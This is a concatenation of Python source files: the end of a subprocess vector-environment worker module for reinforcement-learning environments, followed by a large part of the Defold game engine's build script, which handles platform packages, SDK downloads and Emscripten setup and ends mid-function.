dtype=self.dtype).reshape(self.shape) def _setup_buf(space): if isinstance(space, gym.spaces.Dict): assert isinstance(space.spaces, OrderedDict) buffer = {k: _setup_buf(v) for k, v in space.spaces.items()} elif isinstance(space, gym.spaces.Tuple): assert isinstance(space.spaces, tuple) buffer = tuple([_setup_buf(t) for t in space.spaces]) else: buffer = ShArray(space.dtype, space.shape) return buffer class SubprocEnvWorker(EnvWorker): """Subprocess worker used in SubprocVectorEnv and ShmemVectorEnv.""" def __init__(self, env_fn: Callable[[], gym.Env], share_memory=False) -> None: super().__init__(env_fn) self.parent_remote, self.child_remote = Pipe() self.share_memory = share_memory self.buffer = None if self.share_memory: dummy = env_fn() obs_space = dummy.observation_space dummy.close() del dummy self.buffer = _setup_buf(obs_space) args = (self.parent_remote, self.child_remote, CloudpickleWrapper(env_fn), self.buffer) self.process = Process(target=_worker, args=args, daemon=True) self.process.start() self.child_remote.close() def __getattr__(self, key: str) -> Any: self.parent_remote.send(['getattr', key]) return self.parent_remote.recv() def _decode_obs(self, isNone): def decode_obs(buffer): if isinstance(buffer, ShArray): return buffer.get() elif isinstance(buffer, tuple): return tuple([decode_obs(b) for b in buffer]) elif isinstance(buffer, 
dict): return {k: decode_obs(v) for k, v in buffer.items()} else: raise NotImplementedError return decode_obs(self.buffer) def reset(self) -> Any: self.parent_remote.send(['reset', None]) obs = self.parent_remote.recv() if self.share_memory: obs = self._decode_obs(obs) return obs @staticmethod def wait(workers: List['SubprocEnvWorker'], wait_num: int, timeout: Optional[float] = None) -> List['SubprocEnvWorker']: conns, ready_conns = [x.parent_remote for x in workers], [] remain_conns = conns t1 = time.time() while len(remain_conns) > 0 and len(ready_conns) < wait_num: if timeout: remain_time = timeout - (time.time() - t1) if remain_time <= 0: break else: remain_time = timeout # connection.wait hangs if the list is empty new_ready_conns = connection.wait( remain_conns, timeout=remain_time) ready_conns.extend(new_ready_conns) remain_conns = [conn for conn in remain_conns if conn not in ready_conns] return [workers[conns.index(con)] for con in ready_conns] def send_action(self, action: np.ndarray) -> None: self.parent_remote.send(['step', action]) def get_result(self) -> Tuple[ np.ndarray, np.ndarray, np.ndarray, np.ndarray]: obs, rew, done, info = self.parent_remote.recv() if self.share_memory: obs = self._decode_obs(obs) return obs, rew, done, info def seed(self, seed: Optional[int] = None) -> List[int]: self.parent_remote.send(['seed', seed]) return self.parent_remote.recv() def render(self, **kwargs) -> Any: self.parent_remote.send(['render', kwargs]) return self.parent_remote.recv() def close_env(self) -> None: try: self.parent_remote.send(['close', None]) # mp may be deleted so it may raise AttributeError self.parent_remote.recv() self.process.join() except (BrokenPipeError, EOFError, AttributeError): pass # ensure the subproc is terminated self.process.terminate()
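# --- Illustrative addition (not part of the original subproc.py) ---
# ShArray backs the optional share_memory mode above: the worker process writes
# observations into a multiprocessing.Array and the parent reads them back via
# _decode_obs, instead of pickling arrays through the pipe. A minimal round-trip
# under that assumption (uses the ShArray class defined in this file); nothing
# calls this function.
def _example_sharray_roundtrip():
    arr = ShArray(np.dtype(np.float32), (2, 3))    # shared buffer for a (2, 3) float32 observation
    obs = np.arange(6, dtype=np.float32).reshape(2, 3)
    arr.save(obs)                                  # copy the observation into shared memory
    assert np.array_equal(arr.get(), obs)          # read back an identical array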
build.py
#!/usr/bin/env python # Copyright 2020 The Defold Foundation # Licensed under the Defold License version 1.0 (the "License"); you may not use # this file except in compliance with the License. # # You may obtain a copy of the License, together with FAQs at # https://www.defold.com/license # # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. # add build_tools folder to the import search path import sys, os from os.path import join, dirname, basename, relpath, expanduser, normpath, abspath sys.path.append(os.path.join(normpath(join(dirname(abspath(__file__)), '..')), "build_tools")) import shutil, zipfile, re, itertools, json, platform, math, mimetypes import optparse, subprocess, urllib, urlparse, tempfile, time import imp import github import run import s3 import release_to_github import BuildUtility import http_cache from tarfile import TarFile from glob import glob from threading import Thread, Event from Queue import Queue from ConfigParser import ConfigParser BASE_PLATFORMS = [ 'x86_64-linux', 'x86_64-darwin', 'win32', 'x86_64-win32', 'x86_64-ios', 'armv7-darwin', 'arm64-darwin', 'armv7-android', 'arm64-android', 'js-web', 'wasm-web'] try: sys.path.insert(0, os.path.dirname(__file__)) sys.dont_write_bytecode = True import build_private except Exception, e: class build_private(object): @classmethod def get_target_platforms(cls): return [] @classmethod def get_install_host_packages(cls, platform): # Returns the packages that should be installed for the host return [] @classmethod def get_install_target_packages(cls, platform): # Returns the packages that should be installed for the host return [] @classmethod def install_sdk(cls, configuration, platform): # Installs the sdk for the private platform pass @classmethod def is_library_supported(cls, platform, library): return True finally: sys.dont_write_bytecode = False def get_target_platforms(): return BASE_PLATFORMS + build_private.get_target_platforms() PACKAGES_ALL="protobuf-2.3.0 waf-1.5.9 junit-4.6 protobuf-java-2.3.0 openal-1.1 maven-3.0.1 ant-1.9.3 vecmath vpx-1.7.0 luajit-2.1.0-beta3 tremolo-0.0.8 PVRTexLib-4.18.0 webp-0.5.0 defold-robot-0.7.0 bullet-2.77 libunwind-395b27b68c5453222378bc5fe4dab4c6db89816a jctest-0.6 c-ares-1.16.1 vulkan-1.1.108".split() PACKAGES_HOST="protobuf-2.3.0 cg-3.1 vpx-1.7.0 webp-0.5.0 luajit-2.1.0-beta3 tremolo-0.0.8".split() PACKAGES_EGGS="protobuf-2.3.0-py2.5.egg pyglet-1.1.3-py2.5.egg gdata-2.0.6-py2.6.egg Jinja2-2.6-py2.6.egg Markdown-2.6.7-py2.7.egg".split() PACKAGES_IOS_X86_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1".split() PACKAGES_IOS="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1".split() PACKAGES_IOS_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1 MoltenVK-1.0.41".split() PACKAGES_DARWIN="protobuf-2.3.0 PVRTexLib-4.18.0 webp-0.5.0 vpx-1.7.0".split() PACKAGES_DARWIN_64="protobuf-2.3.0 PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 vpx-1.7.0 tremolo-0.0.8 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 MoltenVK-1.0.41".split() PACKAGES_WIN32="webp-0.5.0 luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 bullet-2.77 c-ares-1.16.1 vulkan-1.1.108".split() 
PACKAGES_WIN32_64="PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 vulkan-1.1.108".split() PACKAGES_LINUX_64="PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 vulkan-1.1.108".split() PACKAGES_ANDROID="protobuf-2.3.0 android-support-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2 c-ares-1.16.1".split() PACKAGES_ANDROID_64="protobuf-2.3.0 android-support-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2 c-ares-1.16.1".split() PACKAGES_EMSCRIPTEN="protobuf-2.3.0 bullet-2.77".split() PACKAGES_NODE_MODULES="xhr2-0.1.0".split() DMSDK_PACKAGES_ALL="vectormathlibrary-r1649".split() CDN_PACKAGES_URL=os.environ.get("DM_PACKAGES_URL", None) CDN_UPLOAD_URL="s3://d.defold.com/archive" PACKAGES_IOS_SDK="iPhoneOS14.0.sdk" PACKAGES_IOS_SIMULATOR_SDK="iPhoneSimulator14.0.sdk" PACKAGES_MACOS_SDK="MacOSX10.15.sdk" PACKAGES_XCODE_TOOLCHAIN="XcodeDefault12.1.xctoolchain" PACKAGES_TAPI_VERSION="tapi1.6" WINDOWS_SDK_10_VERSION="10.0.18362.0" WINDOWS_MSVC_2019_VERSION="14.25.28610" PACKAGES_WIN32_TOOLCHAIN="Microsoft-Visual-Studio-2019-{0}".format(WINDOWS_MSVC_2019_VERSION) PACKAGES_WIN32_SDK_10="WindowsKits-{0}".format(WINDOWS_SDK_10_VERSION) PACKAGES_NODE_MODULE_XHR2="xhr2-v0.1.0" PACKAGES_ANDROID_NDK="android-ndk-r20" PACKAGES_ANDROID_SDK="android-sdk" PACKAGES_LINUX_CLANG="clang-9.0.0" PACKAGES_LINUX_TOOLCHAIN="clang+llvm-9.0.0-x86_64-linux-gnu-ubuntu-16.04" PACKAGES_CCTOOLS_PORT="cctools-port-darwin19-6c438753d2252274678d3e0839270045698c159b-linux" NODE_MODULE_LIB_DIR = os.path.join("ext", "lib", "node_modules") EMSCRIPTEN_VERSION_STR = "2.0.11" EMSCRIPTEN_SDK = "sdk-{0}-64bit".format(EMSCRIPTEN_VERSION_STR) PACKAGES_EMSCRIPTEN_SDK="emsdk-{0}".format(EMSCRIPTEN_VERSION_STR) SHELL = os.environ.get('SHELL', 'bash') ENGINE_LIBS = "testmain ddf particle glfw graphics lua hid input physics resource extension script render rig gameobject gui sound liveupdate crash gamesys tools record iap push iac webview profiler facebook engine sdk".split() EXTERNAL_LIBS = "bullet3d".split() def is_64bit_machine(): return platform.machine().endswith('64') # Legacy format, should be removed eventually # Returns: [linux|x86_64-linux|win32|x86_64-win32|darwin] def get_host_platform(): if sys.platform == 'linux2': arch = platform.architecture()[0] if arch == '64bit': return 'x86_64-linux' else: return 'linux' elif sys.platform == 'win32' and is_64bit_machine(): return 'x86_64-win32' else: return sys.platform # The difference from get_host_platform is that it returns the correct platform # Returns: [x86|x86_64][win32|linux|darwin] def get_host_platform2(): if sys.platform == 'linux2': arch = platform.architecture()[0] if arch == '64bit': return 'x86_64-linux' else: return 'x86-linux' elif sys.platform == 'win32': if is_64bit_machine(): return 'x86_64-win32' else: return 'x86-win32' elif sys.platform == 'darwin': if is_64bit_machine(): return 'x86_64-darwin' else: return 'x86-darwin' else: raise Exception("Unknown host platform: %s" % sys.platform) def format_exes(name, platform): prefix = '' suffix = [''] if 'win32' in platform: suffix = ['.exe'] elif 'android' in platform: prefix = 'lib' suffix = ['.so'] elif 'js-web' in platform: prefix = '' 
suffix = ['.js'] elif 'wasm-web' in platform: prefix = '' suffix = ['.js', '.wasm'] elif platform in ['arm64-nx64']: prefix = '' suffix = ['.nss', '.nso'] else: suffix = [''] exes = [] for suff in suffix: exes.append('%s%s%s' % (prefix, name, suff)) return exes # return '%s%s%s' % (prefix, name, suffix) def format_lib(name, platform): prefix = 'lib' suffix = '' if 'darwin' in platform or 'ios' in platform: suffix = '.dylib' elif 'win32' in platform: prefix = '' suffix = '.dll' else: suffix = '.so' return '%s%s%s' % (prefix, name, suffix) class ThreadPool(object): def __init__(self, worker_count): self.workers = [] self.work_queue = Queue() for i in range(worker_count): w = Thread(target = self.worker) w.setDaemon(True) w.start() self.workers.append(w) def worker(self): func, args, future = self.work_queue.get() while func: try: result = func(*args) future.result = result except Exception,e: future.result = e future.event.set() func, args, future = self.work_queue.get() class Future(object): def __init__(self, pool, f, *args): self.result = None self.event = Event() pool.work_queue.put([f, args, self]) def __call__(self): try: # In order to respond to ctrl+c wait with timeout... while not self.event.is_set(): self.event.wait(0.1) except KeyboardInterrupt,e: sys.exit(0) if isinstance(self.result, Exception): raise self.result else: return self.result def download_sdk(conf, url, targetfolder, strip_components=1, force_extract=False, format='z'): if not os.path.exists(targetfolder) or force_extract: if not os.path.exists(os.path.dirname(targetfolder)): os.makedirs(os.path.dirname(targetfolder)) path = conf.get_local_or_remote_file(url) conf._extract_tgz_rename_folder(path, targetfolder, strip_components, format=format) else: print "SDK already installed:", targetfolder class Configuration(object): def __init__(self, dynamo_home = None, target_platform = None, skip_tests = False, skip_codesign = False, skip_docs = False, skip_builtins = False, skip_bob_light = False, disable_ccache = False, no_colors = False, archive_path = None, package_path = None, set_version = None, channel = None, engine_artifacts = None, waf_options = [], save_env_path = None, notarization_username = None, notarization_password = None, notarization_itc_provider = None, github_token = None, github_target_repo = None, github_sha1 = None, version = None, codesigning_identity = None, windows_cert = None, windows_cert_pass = None): if sys.platform == 'win32': home = os.environ['USERPROFILE'] else: home = os.environ['HOME'] self.dynamo_home = dynamo_home if dynamo_home else join(os.getcwd(), 'tmp', 'dynamo_home') self.ext = join(self.dynamo_home, 'ext') self.dmsdk = join(self.dynamo_home, 'sdk') self.defold = normpath(join(dirname(abspath(__file__)), '..')) self.defold_root = os.getcwd() self.host = get_host_platform() self.host2 = get_host_platform2() self.target_platform = target_platform self.build_utility = BuildUtility.BuildUtility(self.target_platform, self.host, self.dynamo_home) self.skip_tests = skip_tests self.skip_codesign = skip_codesign self.skip_docs = skip_docs self.skip_builtins = skip_builtins self.skip_bob_light = skip_bob_light self.disable_ccache = disable_ccache self.no_colors = no_colors self.archive_path = archive_path self.package_path = package_path self.set_version = set_version self.channel = channel self.engine_artifacts = engine_artifacts self.waf_options = waf_options self.save_env_path = save_env_path self.notarization_username = notarization_username self.notarization_password = 
notarization_password self.notarization_itc_provider = notarization_itc_provider self.github_token = github_token self.github_target_repo = github_target_repo self.github_sha1 = github_sha1 self.version = version self.codesigning_identity = codesigning_identity self.windows_cert = windows_cert self.windows_cert_pass = windows_cert_pass if self.github_token is None: self.github_token = os.environ.get("GITHUB_TOKEN") self.thread_pool = None self.futures = [] if version is None: with open('VERSION', 'r') as f: self.version = f.readlines()[0].strip() self._create_common_dirs() def __del__(self): if len(self.futures) > 0: print('ERROR: Pending futures (%d)' % len(self.futures)) os._exit(5) def _create_common_dirs(self): for p in ['ext/lib/python', 'share', 'lib/js-web/js', 'lib/wasm-web/js']: self._mkdirs(join(self.dynamo_home, p)) def _mkdirs(self, path): if not os.path.exists(path): os.makedirs(path) def _log(self, msg): print msg sys.stdout.flush() sys.stderr.flush() def distclean(self): if os.path.exists(self.dynamo_home): self._log('Removing %s' % self.dynamo_home) shutil.rmtree(self.dynamo_home) for lib in ['dlib','texc']+ENGINE_LIBS: builddir = join(self.defold_root, 'engine/%s/build' % lib) if os.path.exists(builddir): self._log('Removing %s' % builddir) shutil.rmtree(builddir) # Recreate dirs self._create_common_dirs() self._log('distclean done.') def _extract_tgz(self, file, path): self._log('Extracting %s to %s' % (file, path)) version = sys.version_info suffix = os.path.splitext(file)[1] # Avoid a bug in python 2.7 (fixed in 2.7.2) related to not being able to remove symlinks: http://bugs.python.org/issue10761 if self.host == 'x86_64-linux' and version[0] == 2 and version[1] == 7 and version[2] < 2: fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'} run.env_command(self._form_env(), ['tar', 'xf%s' % fmts.get(suffix, 'z'), file], cwd = path) else: fmts = {'.gz': 'gz', '.xz': 'xz', '.bzip2': 'bz2'} tf = TarFile.open(file, 'r:%s' % fmts.get(suffix, 'gz')) tf.extractall(path) tf.close() def _extract_tgz_rename_folder(self, src, target_folder, strip_components=1, format=None): src = src.replace('\\', '/') force_local = '' if os.environ.get('GITHUB_SHA', None) is not None and os.environ.get('TERM', '') == 'cygwin': force_local = '--force-local' # to make tar not try to "connect" because it found a colon in the source file self._log('Extracting %s to %s/' % (src, target_folder)) parentdir, dirname = os.path.split(target_folder) old_dir = os.getcwd() os.chdir(parentdir) if not os.path.exists(dirname): os.makedirs(dirname) if format is None: suffix = os.path.splitext(src)[1] fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'} format = fmts.get(suffix, 'z') cmd = ['tar', 'xf%s' % format, src, '-C', dirname] if strip_components: cmd.extend(['--strip-components', '%d' % strip_components]) if force_local: cmd.append(force_local) run.env_command(self._form_env(), cmd) os.chdir(old_dir) def _extract_zip(self, file, path): self._log('Extracting %s to %s' % (file, path)) zf = zipfile.ZipFile(file, 'r') zf.extractall(path) zf.close() def _extract(self, file, path): if os.path.splitext(file)[1] == '.zip': self._extract_zip(file, path) else: self._extract_tgz(file, path) def _copy(self, src, dst): self._log('Copying %s -> %s' % (src, dst)) shutil.copy(src, dst) def _copy_tree(self, src, dst): self._log('Copying %s -> %s' % (src, dst)) shutil.copytree(src, dst) def _download(self, url): self._log('Downloading %s' % (url)) path = http_cache.download(url, lambda count, total: self._log('Downloading %s %.2f%%' % 
(url, 100 * count / float(total)))) if not path: self._log('Downloading %s failed' % (url)) return path def install_go(self): urls = { 'x86_64-darwin': 'https://storage.googleapis.com/golang/go1.7.1.darwin-amd64.tar.gz', 'x86_64-linux' : 'https://storage.googleapis.com/golang/go1.7.1.linux-amd64.tar.gz', 'win32' : 'https://storage.googleapis.com/golang/go1.7.1.windows-386.zip', 'x86_64-win32' : 'https://storage.googleapis.com/golang/go1.7.1.windows-amd64.zip' } url = urls.get(self.target_platform) if url: path = self._download(url) target_path = join(self.ext, 'go', self.target_platform) self._extract(path, target_path) else: print("No go found for %s" % self.target_platform) def _check_package_path(self): if self.package_path is None: print("No package path provided. Use either --package-path option or DM_PACKAGES_URL environment variable") sys.exit(1) def install_ext(self): def make_package_path(root, platform, package): return join(root, 'packages', package) + '-%s.tar.gz' % platform def make_package_paths(root, platform, packages): return [make_package_path(root, platform, package) for package in packages] self._check_package_path() print("Installing common packages") for p in PACKAGES_ALL: self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.ext) for p in DMSDK_PACKAGES_ALL: self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.dmsdk) # TODO: Make sure the order of install does not affect the outcome! platform_packages = { 'win32': PACKAGES_WIN32, 'x86_64-win32': PACKAGES_WIN32_64, 'x86_64-linux': PACKAGES_LINUX_64, 'darwin': PACKAGES_DARWIN, # ?? Still used by bob-light? 'x86_64-darwin': PACKAGES_DARWIN_64, 'armv7-darwin': PACKAGES_IOS, 'arm64-darwin': PACKAGES_IOS_64, 'x86_64-ios': PACKAGES_IOS_X86_64, 'armv7-android': PACKAGES_ANDROID, 'arm64-android': PACKAGES_ANDROID_64, 'js-web': PACKAGES_EMSCRIPTEN, 'wasm-web': PACKAGES_EMSCRIPTEN } base_platforms = self.get_base_platforms() target_platform = self.target_platform other_platforms = set(platform_packages.keys()).difference(set(base_platforms), set([target_platform, self.host])) if target_platform in ['js-web', 'wasm-web']: node_modules_dir = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR) for package in PACKAGES_NODE_MODULES: path = join(self.defold_root, 'packages', package + '.tar.gz') name = package.split('-')[0] self._extract_tgz(path, join(node_modules_dir, name)) installed_packages = set() for platform in other_platforms: packages = platform_packages.get(platform, []) package_paths = make_package_paths(self.defold_root, platform, packages) print("Installing %s packages " % platform) for path in package_paths: self._extract_tgz(path, self.ext) installed_packages.update(package_paths) for base_platform in self.get_base_platforms(): packages = list(PACKAGES_HOST) + build_private.get_install_host_packages(base_platform) packages.extend(platform_packages.get(base_platform, [])) package_paths = make_package_paths(self.defold_root, base_platform, packages) package_paths = [path for path in package_paths if path not in installed_packages] if len(package_paths) != 0: print("Installing %s packages" % base_platform) for path in package_paths: self._extract_tgz(path, self.ext) installed_packages.update(package_paths) target_packages = platform_packages.get(self.target_platform, []) + build_private.get_install_target_packages(self.target_platform) target_package_paths = make_package_paths(self.defold_root, self.target_platform, target_packages) target_package_paths = [path for path in 
target_package_paths if path not in installed_packages] if len(target_package_paths) != 0: print("Installing %s packages" % self.target_platform) for path in target_package_paths: self._extract_tgz(path, self.ext) installed_packages.update(target_package_paths) print("Installing python eggs") run.env_command(self._form_env(), ['python', '-m', 'easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), 'pip']) run.env_command(self._form_env(), ['python', '-m', 'pip', '-q', '-q', 'install', '-t', join(self.ext, 'lib', 'python'), 'requests', 'pyaml']) for egg in glob(join(self.defold_root, 'packages', '*.egg')): self._log('Installing %s' % basename(egg)) run.env_command(self._form_env(), ['python', '-m', 'easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), '-N', egg]) print("Installing javascripts") for n in 'js-web-pre.js'.split(): self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share')) for n in 'js-web-pre-engine.js'.split(): self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share')) print("Installing profiles etc") for n in itertools.chain(*[ glob('share/*%s' % ext) for ext in ['.mobileprovision', '.xcent', '.supp']]): self._copy(join(self.defold_root, n), join(self.dynamo_home, 'share')) # Simple way to reduce number of warnings in the build proto_path = os.path.join(self.dynamo_home, 'share', 'proto') if not os.path.exists(proto_path): os.makedirs(proto_path) # Note: This is a step we want to separate from install_ext # since it should actually be before install_ext (e.g. to build the extensions) self.install_sdk() def get_local_or_remote_file(self, path): if os.path.isdir(self.package_path): # is is a local path? if os.path.exists(path): return os.path.normpath(os.path.abspath(path)) print "Could not find local file:", path sys.exit(1) dirname, basename = os.path.split(path) path = dirname + "/" + urllib.quote(basename) path = self._download(path) # it should be an url if path is None: print("Error. 
Could not download %s" % path) sys.exit(1) return path def check_sdk(self): sdkfolder = join(self.ext, 'SDKs') folders = [] if self.target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'): folders.append(join(sdkfolder, PACKAGES_MACOS_SDK)) folders.append(join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN)) if self.target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'): folders.append(join(sdkfolder, PACKAGES_IOS_SDK)) folders.append(join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK)) if self.target_platform in ('x86_64-win32', 'win32'): folders.append(join(sdkfolder, 'Win32','WindowsKits','10')) folders.append(join(sdkfolder, 'Win32','MicrosoftVisualStudio14.0','VC')) if self.target_platform in ('armv7-android', 'arm64-android'): folders.append(join(sdkfolder, PACKAGES_ANDROID_NDK)) folders.append(join(sdkfolder, PACKAGES_ANDROID_SDK)) for f in folders: if not os.path.exists(f): print "Missing SDK in", f print "Run './scripts/build.py install_ext --platform=%s'" % self.target_platform sys.exit(1) def install_sdk(self): sdkfolder = join(self.ext, 'SDKs') target_platform = self.target_platform if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'): # macOS SDK download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_MACOS_SDK), join(sdkfolder, PACKAGES_MACOS_SDK)) download_sdk(self,'%s/%s.darwin.tar.gz' % (self.package_path, PACKAGES_XCODE_TOOLCHAIN), join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN)) if target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'): # iOS SDK download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SDK), join(sdkfolder, PACKAGES_IOS_SDK)) download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SIMULATOR_SDK), join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK)) if 'win32' in target_platform or ('win32' in self.host2): win32_sdk_folder = join(self.ext, 'SDKs', 'Win32') download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_SDK_10), join(win32_sdk_folder, 'WindowsKits', '10') ) download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_TOOLCHAIN), join(win32_sdk_folder, 'MicrosoftVisualStudio14.0'), strip_components=0 ) # On OSX, the file system is already case insensitive, so no need to duplicate the files as we do on the extender server if target_platform in ('armv7-android', 'arm64-android'): host = self.host if 'win32' in host: host = 'windows' elif 'linux' in host: host = 'linux' # Android NDK download_sdk(self, '%s/%s-%s-x86_64.tar.gz' % (self.package_path, PACKAGES_ANDROID_NDK, host), join(sdkfolder, PACKAGES_ANDROID_NDK)) # Android SDK download_sdk(self, '%s/%s-%s-android-29-29.0.3.tar.gz' % (self.package_path, PACKAGES_ANDROID_SDK, host), join(sdkfolder, PACKAGES_ANDROID_SDK)) if 'linux' in self.host2: download_sdk(self, '%s/%s.tar.xz' % (self.package_path, PACKAGES_LINUX_TOOLCHAIN), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), format='J') if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios') and 'linux' in self.host2: if not os.path.exists(join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'cctools')): download_sdk(self, '%s/%s.tar.gz' % (self.package_path, PACKAGES_CCTOOLS_PORT), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), force_extract=True) build_private.install_sdk(self, target_platform) def get_ems_dir(self): return join(self.ext, 'SDKs', 'emsdk-' + EMSCRIPTEN_VERSION_STR) def _form_ems_path(self): upstream = join(self.get_ems_dir(), 'upstream', 'emscripten') if os.path.exists(upstream): return upstream return 
join(self.get_ems_dir(), 'fastcomp', 'emscripten') def install_ems(self): # TODO: should eventually be moved to install_sdk emsDir = self.get_ems_dir() os.environ['EMSCRIPTEN'] = self._form_ems_path() os.environ['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten') os.environ['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache') if os.path.isdir(emsDir): print "Emscripten is already installed:", emsDir else: self._check_package_path() platform_map = {'x86_64-linux':'linux','x86_64-darwin':'darwin','x86_64-win32':'win32'} path = join(self.package_path, '%s-%s.tar.gz' % (PACKAGES_EMSCRIPTEN_SDK, platform_map.get(self.host, self.host))) path = self.get_local_or_remote_file(path) self._extract(path, join(self.ext, 'SDKs')) config = os.environ['EM_CONFIG'] if not os.path.isfile(config): self.activate_ems() def activate_ems(self): version = EMSCRIPTEN_VERSION_STR if 'fastcomp' in self._form_ems_path(): version += "-fastcomp" run.env_command(self._form_env(), [join(self.get_ems_dir(), 'emsdk'), 'activate', version, '--embedded']) # prewarm the cache # Although this method might be more "correct", it also takes 10 minutes more than we'd like on CI #run.env_command(self._form_env(), ['%s/embuilder.py' % self._form_ems_path(), 'build', 'SYSTEM', 'MINIMAL']) # .. so we stick with the old version of prewarming # Compile a file warm up the emscripten caches (libc etc) c_file = tempfile.mktemp(suffix='.c') exe_file = tempfile.mktemp(suffix='.js') with open(c_file, 'w') as f: f.write('int main() { return 0; }') run.env_command(self._form_env(), ['%s/emcc' % self._form_ems_path(), c_file, '-o', '%s' % exe_file]) def check_ems(self): config = join(self.get_ems_dir(), '.emscripten') err = False if not os.path.isfile(config): print 'No .emscripten file.' err = True emsDir = self.get_ems_dir() if not os.path.isdir(emsDir): print 'Emscripten tools not installed.' 
err = True if err: print 'Consider running install_ems' def _git_sha1(self, ref = None): return self.build_utility.git_sha1(ref) def _ziptree(self, path, outfile = None, directory = None): # Directory is similar to -C in tar if not outfile: outfile = tempfile.NamedTemporaryFile(delete = False) zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED) for root, dirs, files in os.walk(path): for f in files: p = os.path.join(root, f) an = p if directory: an = os.path.relpath(p, directory) zip.write(p, an) zip.close() return outfile.name def _add_files_to_zip(self, zip, paths, directory=None, topfolder=None): for p in paths: if not os.path.isfile(p): continue an = p if directory: an = os.path.relpath(p, directory) if topfolder: an = os.path.join(topfolder, an) zip.write(p, an) def is_cross_platform(self): return self.host != self.target_platform def is_desktop_target(self): return self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32'] # package the native SDK, return the path to the zip file def _package_platform_sdk(self, platform): with open(join(self.dynamo_home, 'defoldsdk.zip'), 'wb') as outfile: zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED) topfolder = 'defoldsdk' defold_home = os.path.normpath(os.path.join(self.dynamo_home, '..', '..')) # Includes includes = [] cwd = os.getcwd() os.chdir(self.dynamo_home) for root, dirs, files in os.walk("sdk/include"): for file in files: if file.endswith('.h'): includes.append(os.path.join(root, file)) os.chdir(cwd) includes = [os.path.join(self.dynamo_home, x) for x in includes] self._add_files_to_zip(zip, includes, os.path.join(self.dynamo_home, 'sdk'), topfolder) # Configs configs = ['extender/build.yml'] configs = [os.path.join(self.dynamo_home, x) for x in configs] self._add_files_to_zip(zip, configs, self.dynamo_home, topfolder) # Variants variants = [] cwd = os.getcwd() os.chdir(self.dynamo_home) for root, dirs, files in os.walk("extender/variants"): for file in files: if file.endswith('.appmanifest'): variants.append(os.path.join(root, file)) os.chdir(cwd) variants = [os.path.join(self.dynamo_home, x) for x in variants] self._add_files_to_zip(zip, variants, self.dynamo_home, topfolder) def _findlibs(libdir): paths = os.listdir(libdir) paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.a', '.dylib', '.so', '.lib', '.dll')] return paths def _findjars(jardir, ends_with): paths = os.listdir(jardir) paths = [os.path.join(jardir, x) for x in paths if x.endswith(ends_with)] return paths def _findjslibs(libdir): paths = os.listdir(libdir) paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.js',)] return paths # Dynamo libs libdir = os.path.join(self.dynamo_home, 'lib/%s' % platform) paths = _findlibs(libdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # External libs libdir = os.path.join(self.dynamo_home, 'ext/lib/%s' % platform) paths = _findlibs(libdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # Android Jars (Dynamo) jardir = os.path.join(self.dynamo_home, 'share/java') paths = _findjars(jardir, ('android.jar', 'dlib.jar', 'r.jar')) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # 